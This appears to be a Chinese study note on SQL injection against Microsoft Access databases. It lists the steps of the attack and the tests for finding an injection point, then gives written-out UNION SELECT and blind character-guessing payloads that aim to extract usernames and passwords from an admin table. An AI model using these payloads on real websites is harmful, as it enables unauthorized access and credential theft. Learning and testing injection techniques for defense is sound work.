Access数据库结构
以.mdb后缀命名
一个文件就是一个库,和MySQL不同
打开方式用office或者第三方工具
表名—字段名—数据内容
Access注入的基本流程
STEP1:判断注入是否存在
STEP2:猜解表名
STEP3:猜解字段数
STEP4:猜解字段名
STEP5:猜解内容长度
STEP6:猜解内容
判断注入(常见三种)
单引号报错,因为在sql语句中单引号,双引号,小括号都是成对存在的,若在后面加上这句话后,页面出错并且没有被服务器过滤则可能有注入点
逻辑型 And 1=1 and 1=2,
比如原本的sql语句select * from user where id=1是一个true条件,拼接上select * from user where id=1 and 1=1也是true,如果select * from user where id=1 and 1=2这个false的语句成功执行并返回了错误的界面,则很有可能是有注入点
变量做运算 – 减号:
select * from user where id=105-1与select * from user where id=104返回相同的页面,则说明可能有注入点
常见的注入查询方式
联合查询法 union select
and 1=1 and 1=2 ——判断注入
order by 22 ——猜有多少列(22正确,23错误,则为22个)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin ——猜表名并记录回显位(报错说明表名不存在,将admin换成别的继续猜)
假设回显位置为3和15
我们把第三位换为猜测的列名:
union select 1,2,id,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
发现会有回显说明则猜测为正确
union select 1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin ——猜列名
又假设最后有了admin和password列名
union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
就能得到一条用户关键信息的记录
逐字猜解法
and 1=1 and 1=2 ——判断注入
and exists (select * from admin) ——猜表名
and exists (select user_name from admin) ——猜列名
查数据:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(user_name ) from admin)=5(user_name 的长度=5,正常则=5,也可以用>,<号去判断)
and (select top 1 asc(mid(user_name ,1,1)) from admin)=97 判断第一位(97代表‘a’的ascll值)
and (select top 1 asc(mid(user_name ,2,1)) from admin)=97 判断第二位
ADD:top 1子句含义为查询结果只显示首条记录;
偏移注入法
以后学习